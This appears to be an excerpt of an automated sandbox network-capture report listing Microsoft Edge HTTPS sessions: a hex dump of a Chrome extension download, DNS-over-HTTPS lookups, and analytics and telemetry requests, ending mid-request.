                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-06 22:18:01 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                  Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                  Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                  Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                  Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                  Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                  Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                  Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                  2025-01-06 22:18:01 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                  Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.449958172.64.41.34435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:02 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e37df37c84-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.449959172.64.41.34435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:02 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e3b9998c3c-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e5 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.449961172.64.41.34435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:02 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-06 22:18:02 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-06 22:18:02 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:02 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 8fdf14e418d00f51-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-06 22:18:02 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom))


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.44994018.244.18.274435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:05 UTC925OUTGET /b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:18:05 UTC956INHTTP/1.1 302 Found
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:05 GMT
                                                                                                                                                                  Location: /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                  set-cookie: UID=1E1e49df192553de02181e61736201885; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  set-cookie: XID=1E1e49df192553de02181e61736201885; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 9a614f9e49eb2bcefba1d54afaaf7f80.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                  X-Amz-Cf-Id: q5lUfuka-SM8gziQhzvF-HHRQgpEzWaVXYkvE1jiRtvjFoPFDeHqfg==


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.45000420.42.65.854435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:06 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201884773&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 3857
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
